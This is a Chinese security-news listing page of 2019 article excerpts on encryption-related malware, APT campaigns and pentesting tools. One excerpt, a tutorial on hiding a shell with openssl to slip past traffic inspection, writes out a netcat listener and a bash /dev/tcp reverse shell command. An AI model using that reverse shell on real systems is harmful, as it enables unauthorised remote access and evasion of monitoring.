记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

微软披露加密劫持恶意软件Dexphot,已感染近80000台设备

2018年10月,微软检测到恶意挖矿软件Dexphot的大规模分发行动。Dexphot使用了各种复杂的方法来逃避安全解决方案,包括多层混淆、加密和随机文件名来隐藏安装过程,利用无文件技术在内存中直接运行恶意代码,劫持合法的系统进程来掩盖恶意活动。Dexphot最终目的是在设备上运行加密货币挖掘程序,当用户试图删除恶意软件时,监控服务和预定任务会触发二次感染。微软表示自2018年10月以来不断有Windows设备受到感染,并在今年6月中旬达到峰值的8万多台,自微软部署提高检测率的相关策略和攻击阻止后,每天感染的设备数量开始逐渐下降。复杂的攻击链Dexphot感染的早期阶段涉及许多文件和步骤。在执行阶段,Dexphot首先
发布时间:2019-11-28 13:25 | 阅读:4093 | 评论:0 | 标签:Web安全 Dexphot 恶意挖矿软件 exp 加密

前端加密后的一次渗透测试

*郑重声明:文中涉及的方法,只为交流学习之用。如有人用于非法用途,产生的后果笔者不负任何责任。 0×00前言 在做一次渗透测试项目中,发现使用BurpSuite抓到的包都是经过加密的,加密后的字符串类似base64编码方式,遂采用base64尝试解码,然而并没有解出来…那该怎么办呢?放弃吗?不可能!作为一个二十一世纪的大好青年,怎么能轻易说放弃!(不做项目会被辞退的)于是便有了此文! 0×01 发现加密 在测试过程中使用BurpSuite进行抓包,发现抓到的包为如下类型: 看到蓝色字符串后面为==,想到了base64编码,于是尝试解码,无果… 想到从前端js查看如何进行加密,F12打开开发者工具,然后使用Ctrl+Shift+F全局搜索encrypt: 双击打开,发现如下JS代码,原
发布时间:2019-11-21 12:20 | 阅读:3498 | 评论:0 | 标签:加密

使用卷序列号作为加密密钥:APT恶意软件LOWKEY分析

概述在2019年8月,FireEye发布了有关最新发现的威胁组织——APT41的“Double Dragon”报告。APT41是一个与亚洲某国家联系紧密的双重间谍组织,聚焦于财务领域,该恶意组织主要针对游戏、医疗保健、高科技、高等教育、电信和旅游服务等行业。本文主要分析了我们发现的一个复杂、被动型后门,在关于APT41的报告中曾经提到,并且在最近的FireEye Cyber Defense Summit会议上与大家进行了分享。我们观察到,LOWKEY被用于一些针对性非常强的实际攻击之中,并利用仅能在特定系统上运行的Payload。文章中还使用了其他恶意软件家族名称,并进行了简要描述。有关APT41使用的恶意软件的完整概
发布时间:2019-11-13 13:10 | 阅读:10013 | 评论:0 | 标签:恶意软件 技术 加密

Apple Mail明文保存加密邮件

苹果公司IT专家Bob Gendler今年早些时间发现macOS上的Apple Mail app以明文的形式将加密邮件保存在snippets.db数据库中,目前还没有被修复。Gendler早在今年7月就将该问题告诉了公司,截至目前苹果公司还没有官方发布漏洞修复的时间轴,但据The Verge的消息,补丁即将修复。APPLE MAIL + SIRI = BAD该漏洞的来源是因为Siri的一个允许苹果语音助手提供联系人信息的功能。Gendler说,Siri使用了一个名为suggestd的进程来为不同的app提供通讯录信息。不管进程发现了什么都会保存在snippets.db文件中,以防用户想要使用联系人推荐的功能。研究发现如
发布时间:2019-11-11 13:10 | 阅读:17760 | 评论:0 | 标签:Web安全 Apple Mail 加密

基于机器学习的恶意软件加密流量检测

1 概述 近年来随着HTTPS的全面普及,为了确保通信安全和隐私,越来越多的网络流量开始采用HTTPS加密,截止今日,超过65%的网络流量已使用https加密。 HTTPS的的推出,主要是为了应对各种窃听和中间人攻击,以在不安全的网络上建立唯一安全的信道,并加入数据包加密和服务器证书验证。但是随着所有互联网中加密网络流量的增加,恶意软件也开始使用HTTPS来保护自己的通信。 这种情况对安全分析人员构成了挑战,因为流量是加密的,而且大多数情况下看起来像正常的流量。 检测企业内部HTTPS流量的一种常见的解决方案是安装HTTPS拦截代理。 这些硬件服务器可以通过在其计算机中安装特殊证书来打开和检查员工的HTTPS流量。 HTTPS拦截器位于客户端和服务器之间,其中加密流量被解密,扫描恶意软件后,再次加密并发送到目标
发布时间:2019-10-25 17:30 | 阅读:19848 | 评论:0 | 标签:加密

Graboid:首例在Docker Hub映像中发现的加密劫持蠕虫

概要Unit 42的研究人员发现了一种名为“Graboid”的新型加密劫持蠕虫,该病毒能通过恶意Docker镜像传播,现已感染2,000多个Docker主机。这也是首次发现使用Docker Engine(社区版)中的容器传播的加密劫持蠕虫。由于大多数传统的端点保护软件都不检查容器内的数据和活动,因此这种恶意活动可能很难检测到。最初的立足点由攻击者通过不安全的Docker守护进程获得,在守护进程中首先安装Docker映像以在受感染的主机上运行,用于挖掘加密货币的恶意软件从C2服务器下载,恶意软件能定期从C2查询新的易受损主机,并随机选择下一个目标传播。分析显示,平均每个矿工的活动时间为63%,每个采矿周期持续250秒。蠕
发布时间:2019-10-18 13:10 | 阅读:12217 | 评论:0 | 标签:系统安全 docker Graboid 加密劫持 加密

窃取加密货币的新型木马:InnfiRAT

背景近日,国外安全研究人员曝光了一种名为InnfiRAT的新型木马,该木马使用.NET编写,具有窃取用户信息、抓取浏览器Cookie用于窃取密码、屏幕截取、下载执行其他恶意文件等行为。除此之外,该木马还会查找主机上的加密货币钱包信息,用于窃取加密货币(莱特币和比特币)。功能分析木马进程首先检测自身路径是否为%AppData%NvidiaDriver.exe,并且终止名为NvidiaDriver.exe的进程,将自身复制到%AppData%NvidiaDriver.exe再次执行:以NvidiaDriver.exe重新运行后,会拼接一段base64编码的数据,解码后是一个PE文件,加载到内存中执行:获取主机信息,检查Ma
发布时间:2019-09-19 13:10 | 阅读:14792 | 评论:0 | 标签:加密货币 InnfiRAT 加密

一个用于加密传输爆破的BurpSuite插件:jsEncrypter

jsEncrypterjsEncrypter是一个BurpSuite插件,使用phantomjs调用前端加密函数对数据进行加密,方便对加密数据输入点进行fuzz。jsEncrypter下载1:直接在releases下载2:自行编译:git clone https://github.com/c0ny1/jsEncrypter.gitmvn package12git clone https://github.com/c0ny1/jsEncrypter.gitmvn package jsEncrypter安装jsEncrypter插件使用运行靶机项目提供了一个用php编写的靶机(jsEncrypter/server),靶机提供了7个算法对密码进行加密后传输,后台解密,最后进行密码匹配。base64md5sha1sha
发布时间:2019-09-07 12:45 | 阅读:24441 | 评论:0 | 标签:加密

微信聊天安全加密插件,类似Telegram的端对端安全加密:TgWechat

TgWechat 微信聊天安全加密插件仅供个人消遣玩耍,请勿用于非法或者商业用途。若用于非法用途,一切后果由使用者承担,与软件作者无关一款采用Telegram类似的安全加密方案实现的保护个人隐私安全的微信聊天插件。自由切换/端对端加密/安全可靠。不同聊天对象生成不同加密密钥。随意启用或关闭加密功能。传输到微信服务器聊天内容是加密的(不怕私密暴露),本地保存内容明文(方便查看)。不过目前仅支持Windows。功能默认支持多开支持个人聊天文本内容加密支持内置表情加密支持两人群聊(测试功能,多人聊天还在调试中)TgWechat 使用下载安装地址:https://github.com/dplusec/tgwechat下载并打开TgWechat.exe进行快捷安装,还支持更新、卸载、多开微信。使用登陆微信后,进入正常聊天
发布时间:2019-09-05 13:00 | 阅读:26505 | 评论:0 | 标签:加密

针对某区块链数字加密币交易平台发起的APT攻击

一、概述近日,腾讯安全御见威胁情报中心捕获到一起针对某大型数字加密币交易平台客服人员发起的鱼叉式定向攻击。攻击者自称为币圈资深用户,由于对该交易平台客服不满,进而对比了该平台与其竞争关系的xx平台,并列出多条建议在邮件附件中,希望该平台做出改进。邮件附件中包含了一个名为“客服和xx投诉对比和记录2019.xls”的电子表格文件,该文件为攻击诱饵文件,携带Excel 4.0 XLM宏代码,当接收邮件的客服人员打开该文件,且允许执行其中的宏代码,宏代码将拉取一个伪装为HelloWorld的恶意程序执行,最终经过多层恶意代码解密,执行Cobalt Strike远控后门。针对数字加密币公司的定向攻击流程一旦客服人员机器被成功植
发布时间:2019-08-29 18:10 | 阅读:25017 | 评论:0 | 标签:行业 APT攻击 加密

利用openssl加密你的shell

利用openssl加密你的shell 在我们实际的渗透测试过程中,总是有各种各样的流量审查设备挡住我们通往system的道路,尤其是在反弹shell的时候,明文传输的shell总是容易断,那么本文介绍一种利用openssl反弹流量加密的shell来绕过流量审查设备。 常规bash反弹 vps执行 nc -lvvp 4444 目标主机执行 bash -i >& /dev/tcp/172.16.1.1/4444 0>&1 流量明文传输,很容易被拦截。 openssl加密传输 第一步,在vps上生成SSL证书的公钥/私钥对 openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
发布时间:2019-08-26 17:15 | 阅读:25416 | 评论:0 | 标签:加密

ERIS勒索病毒变种来袭,被加密的文件暂无法解密

一、概述腾讯安全御见威胁情报中心监测到,ERIS勒索病毒变种在国内有部分感染。ERIS勒索变种使用go语言编写,加密文件完成后会添加5字节的随机扩展后缀。病毒加密用户数据之后勒索0.05比特币(市值约4000元人民币)。由于该病毒使用RSA+Salsa20对文件进行加密,被加密后的文件暂时无法解密。ERIS勒索病毒为防止用户利用反删除工具恢复文件,该病毒会调用磁盘擦除工具cipher.exe将病毒完成数据加密后删除的原文件彻底破坏,使用户恢复数据的最后希望彻底破灭,我们提醒政企机构高度警惕,腾讯电脑管家、腾讯御点终端安全管理系统均可拦截该病毒。ERIS勒索病毒首次出现于2019年5月,该勒索家族病毒擅长通过垃圾邮件,L
发布时间:2019-08-09 17:25 | 阅读:48794 | 评论:0 | 标签:勒索软件 ERIS 加密

NSA泄露工具被用来传播加密货币挖矿机

普通网络犯罪和针对性攻击的区别在于:普通网络犯罪会将即时的经济目标作为主要动机,而针对性攻击可能还会有其他的目标,比如窃取知识产权。此外,攻击者的思维模式也是不同的。正常的网络犯罪分子需要考虑如何入侵更多的个人设备,而针对性攻击需要计划如何入侵和获取企业网络的访问权限,并尽可能地隐蔽。除此之外,针对性攻击活动常常包括扩展性的计划以及高度专业化的创建和使用。另一方面,正常的攻击者可能没有能力或资源来规划复杂的攻击活动,他们使用的工具更加通用,而且一般地下市场都有。近期,研究人员发现了一起融合了针对性攻击工具和常规网络犯罪的大规模攻击活动:攻击者使用了之前在针对性攻击中使用的复杂攻击来传播加密货币挖矿机和勒索软件这样的典型
发布时间:2019-07-24 12:25 | 阅读:70121 | 评论:0 | 标签:系统安全 加密货币 加密

WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

近日,腾讯安全御见威胁情报中心发现假冒GlobeImposter勒索病毒正在传播,攻击者疑通过MS SQL爆破入侵服务器,通过网络下载恶意脚本代码,继而执行加密和勒索流程。令人惊叹的是,这个所谓的“勒索病毒”执行极为简单,只是利用WinRAR加密压缩用户文件,之后再将一封GlobeImposter的勒索消息邮件修改后恐吓用户,通过邮箱联系索取酬金。腾讯安全提醒大家,如遇到此病毒,不要着急着缴纳赎金。该病毒加密压缩的密码明文写在病毒配置信息中,使用这个密码解压缩,文件就能完全恢复。分析被勒索服务器疑似被通过MSSQL爆破入侵成功,之后执行以下相关命令行进一步下载执行恶意代码:1)bitsadmin  
发布时间:2019-07-03 17:25 | 阅读:81724 | 评论:0 | 标签:勒索软件 系统安全 加密

利用ADB和SSH传播的新型加密货币挖矿僵尸网络现身

趋势科技在最近的研究中发现一种新的加密货币挖矿僵尸网络,它可以通过开放的ADB(Android Debug Bridge)端口进入,并借助SSH传播扩散。这种攻击方法利用了默认情况下打开的ADB端口没有身份验证的设置,类似于之前报告的Satori僵尸网络变体。这个僵尸网络的设计能够让它从受感染的主机传播到任何先前与主机建立SSH连接的系统。利用ADB的做法使得基于Android的设备很容易受攻击。趋势科技在21个不同国家/地区检测到该僵尸网络的活动,在韩国发现的比例最高。技术细节已经发现IP地址45 [.] 67 [.] 14 [.] 179连接到ADB运行设备或系统,然后进行多项活动。图1总结了攻击的感染链。图1.攻
发布时间:2019-06-30 12:25 | 阅读:56756 | 评论:0 | 标签:加密货币 僵尸网络 加密

谷歌发布新开源加密工具,敏感信息泄露的问题可能就此彻底解决!

前言据wired报道,谷歌将发布一个名为Private Join and Compute的开源加密工具。它有助于连接来自不同数据集的数字列,以计算在整个数学过程中加密和不可读数据的总和,计数或平均值。只有计算结果才能被所有各方解密和查看,这意味着你只能获得结果,而不能获得你未拥有的数据。该工具的加密原理可以追溯到20世纪70年代和90年代,但谷歌已经重新利用并更新它们,以便与当今功能更强大、更灵活的处理器配合使用。既可以分析数据,又不担心数据的泄漏,有这样的好事吗?这么多年来,个人隐私数据的事件不但发生,屡禁不止,就其根源,很大程度上是因为有人要利用这些大数据对用户的各种行为习惯进行分析。只要这个动机存在,用户的隐私泄
发布时间:2019-06-22 12:25 | 阅读:63362 | 评论:0 | 标签:安全工具 谷歌 加密

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云